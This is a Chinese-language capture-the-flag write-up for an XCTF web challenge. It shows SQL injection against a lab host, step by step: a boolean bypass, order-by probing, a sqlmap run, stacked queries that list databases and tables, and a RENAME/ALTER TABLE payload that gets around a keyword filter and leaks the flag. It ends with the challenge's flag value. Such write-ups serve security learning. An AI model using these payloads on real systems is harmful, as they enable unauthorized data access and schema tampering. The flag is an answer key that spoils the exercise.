靶场地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5417&page=1
参考链接
https://zhuanlan.zhihu.com/p/78989602
https://www.jianshu.com/p/e896bd3f5097
本以为简单的目录遍历就可以得到falg实际上是想多了,不过也确认这里是存在注入
http://220.249.52.133:38618/?inject=1' or '1'='1#
在试一下sqlmap
python2 sqlmap.py -u "http://220.249.52.133:38618/?inject=1" -v 3 --risk 3 -D supersqli --tables -test-skip=where
失败
order by一下
http://220.249.52.133:38618/?inject=1'order by 2--+
得出有两个参数
union联合查询一下
失败 (同时也发现了为什么sqlmap跑不出来了)select|update|drop|insert|where 等等被禁用了
借用上两篇教程了解到堆叠注入
暴库
http://220.249.52.133:38618/?inject=1';show databases;#
爆表
http://220.249.52.133:38618/?inject=1';show tables;#
查看字段
http://220.249.52.133:38618/?inject=1';show columns from `1919810931114514`;#
由于select有限制但是没有过滤 alert 和 rename,那么我们可以把表改个名字,再给列改个名字。
先把 words 改名为 words1,再把这个数字表改名为 words,然后把新的 words 里的 flag 列改为 id (避免一开始无法查询)。
这样就可以让程序直接查询出 flag 了。
构造 payload 如下,然后访问,看到这个看来就执行到最后一个语句了。(改表名那里直接从 pma 拷了一个语句过来改- -)
/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#
/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#collate
查看一下
/?inject=1' or '1'='1
flag{c168d583ed0d4d7196967b28cbd0b5e9}
新手上路,多多指教